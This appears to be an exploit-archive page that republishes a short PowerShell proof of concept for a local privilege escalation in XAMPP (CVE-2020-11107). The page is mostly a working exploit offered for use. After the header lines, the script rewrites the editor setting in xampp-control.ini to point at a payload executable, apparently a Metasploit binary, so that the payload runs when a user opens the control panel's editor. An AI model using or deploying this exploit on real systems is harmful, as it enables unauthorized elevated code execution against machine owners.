Share
## https://sploitus.com/exploit?id=PACKETSTORM:164292
# Exploit Title: XAMPP 7.4.3 - Local Privilege Escalation  
# Exploit Author: Salman Asad (@deathflash1411, salman@defmax.io)  
# Original Author: Maximilian Barz (@S1lkys)  
# Date: 27/09/2021  
# Vendor Homepage: https://www.apachefriends.org  
# Version: XAMPP < 7.2.29, 7.3.x < 7.3.16 & 7.4.x < 7.4.4  
# Tested on: Windows 10 + XAMPP 7.3.10  
# References: https://github.com/S1lkys/CVE-2020-11107  
  
$file = "C:\xampp\xampp-control.ini"  
$find = ((Get-Content $file)[2] -Split "=")[1]  
# Insert your payload path here  
$replace = "C:\temp\msf.exe"  
(Get-Content $file) -replace $find, $replace | Set-Content $file